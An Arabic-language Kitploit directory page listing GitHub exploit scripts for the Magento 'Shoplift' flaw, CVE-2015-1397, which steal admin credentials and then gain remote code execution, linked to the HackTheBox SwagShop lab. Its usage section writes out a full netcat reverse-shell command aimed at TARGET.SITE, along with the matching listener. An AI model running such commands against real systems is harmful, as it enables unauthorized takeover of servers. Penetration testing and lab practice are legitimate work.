Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2015-1397-Magento-Shoplift — نصوص استغلال لـ CVE-2015-1397 في Magento CMS، بما في ذلك استغلال قبل المصادقة للحصول على بيانات اعتماد المسؤول ووحدة RCE بعد المصادقة لتنفيذ قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/wytchwulf/cve-2015-1397-magento-shoplift
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراق
GitHubwytchwulf/cve-2015-1397-magento-shoplift

CVE-2015-1397-Magento-Shoplift

نصوص استغلال لـ CVE-2015-1397 في Magento CMS، بما في ذلك استغلال قبل المصادقة للحصول على بيانات اعتماد المسؤول ووحدة RCE بعد المصادقة لتنفيذ قشرة عكسية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد
مشاركة

CVE-2015-1397-Magento-Shoplift

تفاصيل الثغرة

الثغرة كما تظهر في HackTheBox - SwagShop

المرحلة 1 = exploit.py

الحصول على بيانات اعتماد المسؤول للوحة تحكم Magento CMS

المرحلة 2 = post_auth.py

بعد الحصول على بيانات الاعتماد من exploit.py وإضافتها إلى post_auth.py، قم بتشغيل:

root@kitploit:~
python3 post_auth.py http://TARGET.SITE/index.php/admin "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f"

المستمع:

root@kitploit:~
nc -lvnp 4444
تنزيل الأداة